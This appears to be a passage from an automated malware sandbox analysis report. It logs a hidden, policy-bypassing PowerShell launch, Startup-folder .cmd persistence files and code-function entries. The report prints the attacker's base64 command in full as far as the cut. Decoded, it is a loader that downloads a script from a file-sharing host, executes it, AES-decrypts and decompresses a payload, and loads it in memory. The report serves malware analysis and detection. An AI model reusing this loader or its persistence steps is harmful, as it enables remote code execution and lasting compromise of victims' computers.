                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00404734 LoadLibraryA,GetProcAddress,15_2_00404734
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_034ED160 pushad ; ret 11_2_034ED173
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_034ED031 push esp; ret 11_2_034ED043
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_034ED0C8 pushad ; ret 11_2_034ED173
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_034EDE60 push eax; ret 11_2_034EDE73
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB06C0 push es; retf 11_2_07CB06CE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB56BC push edi; retf 11_2_07CB5796
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB5590 push edi; retf 11_2_07CB5796
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB549D push esp; retf 11_2_07CB549E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB51E4 push ecx; retf 11_2_07CB51EE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB500D push eax; retf 11_2_07CB500E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07CB0E38 push cs; retf 11_2_07CB0E46
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd\:Zone.Identifier:$DATAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd\:Zone.Identifier:$DATAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
